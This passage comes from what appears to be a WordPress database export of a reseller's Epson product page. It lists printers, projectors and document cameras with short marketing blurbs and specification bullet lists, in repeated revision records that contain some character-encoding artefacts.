Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>PHOTO PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"241\" height=\"175\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson L850 PrinterÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L805 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></h4><p><br />The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h2>Projectors for Work</h2>		\n			<h2>CORPORATE AND EDUCATIONÂ </h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-2055</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-2142W</strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" />\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\n<ul>\n 	<li>White and Colour Brightness at 4,200lm</li>\n 	<li>WXGA Resolution</li>\n 	<li>12000 hours lamp life in eco-mode</li>\n 	<li>MHL-enabled</li>\n 	<li>Multi-PC Projection</li>\n 	<li>Horizontal Keystone Slider</li>\n 	<li>Miracast<sup>Â®</sup></li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-L500WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /><br>\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\n<ul>\n 	<li>5,000 lumens colour/white brightness<sup>Â </sup></li>\n 	<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li>\n 	<li>Laser light source of up to 20,000 hours</li>\n 	<li>Virtually maintenance-free for optical engine life</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>ACCENT LIGHTING LASER PROJECTORS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson LightScene EV-105</strong><br /><br /></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>ULTRA PORTABLE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-1785WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"238\" height=\"177\" />\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\n<ul>\n 	<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li>\n 	<li>WXGA Resolution</li>\n 	<li>Real-Time Auto Keystone Correction</li>\n 	<li>Split Screen Projection</li>\n 	<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INTERACTIVE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-536WiÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></h4>\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\n<ul>\n 	<li>WXGA Resolution</li>\n 	<li>White and Colour Brightness at 3,300lm</li>\n 	<li>Multi-PC projection</li>\n 	<li>HDMI Connectivity x2</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>HIGH BRIGHTNESS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-L1405UNLÂ </strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /><br>\nThe Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.\n<ul>\n 	<li>White and Colour Brightness at 8,000lm</li>\n 	<li>WUXGA (1920 x 1200)</li>\n 	<li>Edge-blending to create large panoramic images</li>\n 	<li>Curve and corner wall projection</li>\n 	<li>HDBaseT</li>\n</ul>\n[maxbutton id=\"12\" ]<h4><strong>Epson EB-G7400UNLÂ </strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /><br>\nEpson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.\n<em>* With optional ELPLX01 zero offset ultra-short throw lens.</em>\n<ul>\n 	<li>High Brightness</li>\n 	<li>Beyond Full HD Resolution</li>\n 	<li>Powered Lens</li>\n 	<li>Portrait Projection</li>\n 	<li>Flexible Installation</li>\n 	<li>Edge Blending</li>\n 	<li>Point Correction</li>\n</ul>\n[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson EB-Z10000UÂ </strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /><br>\nDiscover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.\n<ul>\n 	<li>White and Colour Brightness at 10,000Â lm</li>\n 	<li>WUXGA resolution</li>\n 	<li>High Reliability and Durability</li>\n 	<li>Suitable for 24/7 usage</li>\n 	<li>Flexible projection angles and installations</li>\n</ul>\n[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-26 11:09:05','2019-09-26 03:09:05','',1486,'https://bintara.com.my/blog/2019/09/26/1486-revision-v1/',0,'revision','',0),(3503,1,'2019-09-26 11:19:13','2019-09-26 03:19:13','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>PHOTO PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"241\" height=\"175\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson L850 PrinterÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: 